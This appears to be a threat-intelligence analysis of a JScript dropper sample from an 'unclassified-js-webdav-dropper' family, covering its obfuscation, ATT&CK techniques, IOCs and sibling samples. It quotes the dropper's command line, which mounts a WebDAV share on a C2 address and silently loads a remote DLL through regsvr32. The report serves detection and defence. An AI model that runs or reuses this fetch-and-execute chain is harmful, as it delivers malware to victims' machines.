familyunclassified-js-webdav-dropperconfidencehighcreated2026-07-24
SHA-256: 91b12857bf51d641c1c7abec632fad52005640283a9ea4cd06db50997edf229d
91b12857bf51 — 17264699919263544.js
Build / RE
- Language / runtime: JScript (Windows Script Host), single-file
.js with no batch/polyglot layer. ^[file.txt]
- Obfuscation: 100-entry random-noise dictionary lookup table (
dmuomturb object), mapping 8–20 character lowercase noise strings to single characters. The table is assembled via semicolon-delimited dmuomturb['key']="char"; assignments and consumed by a Function("return this")()["eval"](...) chain that evaluates a second-order concatenated payload. ^[strings.txt:1]
- Anti-analysis: None. No debugger checks, no VM detection, no time-bombs, no connectivity checks, no sandbox gates. The payload executes unconditionally on load.
- Code quality: Low. Hand-written, verbose, repetitive. 100 noise-key assignments + one
eval call. No commercial obfuscator signatures (no javascript-obfuscator, no obfuscator.io).
Deploy / ATT&CK
| Tactic |
Technique |
Evidence |
| Execution |
T1059.005 (Visual Basic / JScript) |
.js file opened by user via wscript.exe or cscript.exe. ^[file.txt] |
| Execution |
T1218.010 (Regsvr32) |
regsvr32 /s \\94.159.113.84@8888\DavWWWRoot\29931783930377.dll ^[strings.txt:1] |
| Defense Evasion |
T1218 (System Binary Proxy Execution) |
regsvr32 (signed system binary) silently loads remote DLL. ^[strings.txt:1] |
| Defense Evasion |
T1036.005 (Match Legitimate Name or Location) |
regsvr32 is a signed Windows system binary. ^[strings.txt:1] |
| Defense Evasion |
T1027 (Obfuscated Files or Information) |
100-entry noise-dictionary lookup table obfuscation. ^[strings.txt:1] |
| Command & Control |
T1071.001 (Web Protocols) |
WebDAV over HTTP via UNC path \\94.159.113.84@8888\DavWWWRoot\. ^[strings.txt:1] |
| Command & Control |
T1105 (Ingress Tool Transfer) |
net use mounts remote WebDAV share; regsvr32 fetches and loads DLL in one command. ^[strings.txt:1] |
- C2 infrastructure: WebDAV endpoint
94.159.113.84:8888 (same IP as siblings fbdd83ad, e2568b43, c4670e86, f01dca2e, f51f6323, and 89fd6436). ^[strings.txt:1]
- Payload filename:
29931783930377.dll (numeric, 14-digit — consistent with family naming convention). ^[strings.txt:1]
- Execution chain:
cmd /c net use \\94.159.113.84@8888\DavWWWRoot\ && regsvr32 /s \\94.159.113.84@8888\DavWWWRoot\29931783930377.dll — no PowerShell wrapper, no wordpad decoy, no timeout gate, no nested try/catch decoys. Minimal footprint, direct WScript.Shell.run() dispatch. ^[strings.txt:1]
- Persistence: None observed. One-shot execution, no registry writes, no startup-folder drops, no scheduled tasks.
Attribution
- Family: Confirmed sibling #100 of unclassified-js-webdav-dropper. Same execution engine (dictionary lookup table →
Function("return this")()["eval"] → WScript.Shell.run()), same C2 subnet (94.159.113.x), same numeric payload naming convention. The 100th confirmed sibling marks sustained, continuous activity across this infrastructure cluster.
- Confidence: High. All behavioural indicators match the established family signature.
IOCs
| Indicator |
Type |
Context |
94.159.113.84:8888 |
IPv4:port |
WebDAV C2 endpoint |
\\94.159.113.84@8888\DavWWWRoot\ |
UNC path |
WebDAV mount + DLL fetch path |
29931783930377.dll |
filename |
Remote DLL payload |
Sibling Context
fbdd83ad — 66th sibling, same C2 IP 94.159.113.84:8888, 100-entry dictionary, payload 317101471316421.dll. ^[entities/unclassified-js-webdav-dropper.md]
e2568b43 — 83rd sibling, same C2 IP, 100-entry dictionary, adds timeout gate, payload 168529734355.dll. ^[entities/unclassified-js-webdav-dropper.md]
c4670e86 — 76th sibling, same C2 IP, 100-entry dictionary, payload 22598943117575.dll. ^[entities/unclassified-js-webdav-dropper.md]
f01dca2e — 86th sibling, same C2 IP, 100-entry dictionary, payload 30197980715234.dll. ^[entities/unclassified-js-webdav-dropper.md]
f51f6323 — 89th sibling, same C2 IP, 100-entry dictionary, payload 124762709410083.dll. ^[entities/unclassified-js-webdav-dropper.md]
89fd6436 — 97th sibling, same C2 IP, 100-entry dictionary, adds timeout gate, payload 300471679318983.dll. ^[entities/unclassified-js-webdav-dropper.md]
8323305a — 94th sibling, same C2 IP, 100-entry dictionary, payload 206721718212887.dll. ^[entities/unclassified-js-webdav-dropper.md]
Notes
- CAPE skipped: file type is ASCII text (JScript), not a supported binary class for detonation. ^[dynamic-analysis.md]
- The
dmuomturb dictionary object name is unique to this sample within the family (no prior sibling uses this identifier).